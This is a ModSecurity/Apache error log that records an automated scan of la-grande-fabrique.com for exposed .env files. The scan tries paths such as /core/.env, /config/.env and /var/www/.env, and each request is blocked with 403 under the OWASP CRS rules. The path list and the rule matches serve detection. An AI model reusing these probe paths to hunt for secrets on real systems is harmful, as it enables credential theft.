[Mon May 11 14:09:56.581129 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwgAAAQ4"]
[Mon May 11 14:09:56.783226 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwwAAAQ4"]
[Mon May 11 14:09:56.783608 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwwAAAQ4"]
[Mon May 11 14:09:56.783795 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwwAAAQ4"]
[Mon May 11 14:09:56.784036 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwwAAAQ4"]
[Mon May 11 14:09:56.991595 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAxQAAAQ4"]
[Mon May 11 14:09:56.991974 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAxQAAAQ4"]
[Mon May 11 14:09:56.992150 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAxQAAAQ4"]
[Mon May 11 14:09:56.992441 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAxQAAAQ4"]
[Mon May 11 14:09:57.284825 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAxwAAAQ4"]
[Mon May 11 14:09:57.285226 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAxwAAAQ4"]
[Mon May 11 14:09:57.285416 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAxwAAAQ4"]
[Mon May 11 14:09:57.285667 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAxwAAAQ4"]
[Mon May 11 14:09:57.391312 2026] [core:error] [pid 1320674:tid 1320702] [client 52.242.216.199:21735] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:57.391349 2026] [core:error] [pid 1320674:tid 1320702] [client 52.242.216.199:21735] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:57.509068 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyAAAAQ4"]
[Mon May 11 14:09:57.509465 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyAAAAQ4"]
[Mon May 11 14:09:57.509650 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyAAAAQ4"]
[Mon May 11 14:09:57.509898 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyAAAAQ4"]
[Mon May 11 14:09:57.758407 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyQAAAQ4"]
[Mon May 11 14:09:57.758784 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyQAAAQ4"]
[Mon May 11 14:09:57.758988 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyQAAAQ4"]
[Mon May 11 14:09:57.759256 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAyQAAAQ4"]
[Mon May 11 14:09:57.921581 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAywAAAQ4"]
[Mon May 11 14:09:57.921962 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAywAAAQ4"]
[Mon May 11 14:09:57.922143 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAywAAAQ4"]
[Mon May 11 14:09:57.922419 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHHFVchVQ3tCn0m9OpAywAAAQ4"]
[Mon May 11 14:09:57.961776 2026] [core:error] [pid 1319953:tid 1319964] [client 52.242.216.199:59609] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:57.961817 2026] [core:error] [pid 1319953:tid 1319964] [client 52.242.216.199:59609] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:58.155279 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzAAAAQ4"]
[Mon May 11 14:09:58.155698 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzAAAAQ4"]
[Mon May 11 14:09:58.155915 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzAAAAQ4"]
[Mon May 11 14:09:58.156180 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzAAAAQ4"]
[Mon May 11 14:09:58.348915 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzQAAAQ4"]
[Mon May 11 14:09:58.349293 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzQAAAQ4"]
[Mon May 11 14:09:58.349472 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzQAAAQ4"]
[Mon May 11 14:09:58.349706 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzQAAAQ4"]
[Mon May 11 14:09:58.537994 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzgAAAQ4"]
